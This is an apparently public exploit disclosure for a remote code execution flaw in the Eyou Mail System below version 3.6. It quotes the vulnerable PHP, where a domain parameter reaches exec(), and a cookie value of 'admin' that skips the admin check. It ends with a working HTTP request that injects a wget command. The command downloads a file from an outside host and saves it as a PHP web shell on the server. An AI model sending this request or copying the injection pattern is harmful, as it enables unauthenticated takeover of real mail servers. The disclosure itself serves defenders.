Eyou Mail System Remote Code Execution

`Hi!  
The Eyou Mail System have a Remote Code Execution in \inc\fuction.php.It affects version below 3.6.  
The Vulnerability fuction is get_login_ip_config_file in \inc\fuction.php.  
function get_login_ip_config_file($domain, $file) {  
$dir = '/var/eyou/Domain/';   
$dir_mail = exec('/var/eyou/sbin/hashid '.$domain); //$domain can control by us.  
....  
}  
the other file in \admin\domain\ip_login_set\d_ip_login_get.php.  
<?php  
...  
require_once('inc/domain.config.php');  
//ValidateAdmin(); //We donn't need to login in.  
$domainname = get_domain(); //Get cookie¡¡¡¡  
$allow_file = 'web_login_allow_ip';   
$deny_file = 'web_login_deny_ip';   
$domain = trim(get('domain')); //$domain from here.  
$type = trim(get('type'));¡¡¡¡//Get type  
$res = '';  
if($domainname !== 'admin' && $domainname !== $domain) { //we just need control $cookie=admin can bypass it and go on.  
echo '';  
exit;  
}  
if($type === 'allow') {¡¡//$type any go  
$file = $allow_file;  
$res .= 'ip_allow&';  
} elseif($type === 'deny') {  
$file = $deny_file;  
$res .= 'ip_deny&';  
} else {  
echo '';  
exit;  
}  
$file = get_login_ip_config_file($domain, $file);// use the vulnerability fuction   
if($file === FALSE) {  
echo $res;  
exit;  
}   
  
Exp:  
GET /admin/domain/ip_login_set/d_ip_login_get.php?domain=%3Bwget%20http://conqu3r.paxmac.org/exp.txt%3Bcp%20exp.txt%20exp.php&type=allow HTTP/1.1  
Host: mail.xxx.com.cn  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Cookie:cookie=admin  
Connection: keep-alive  
Thanks.  
  
  
  
conqu3r.zeng  
`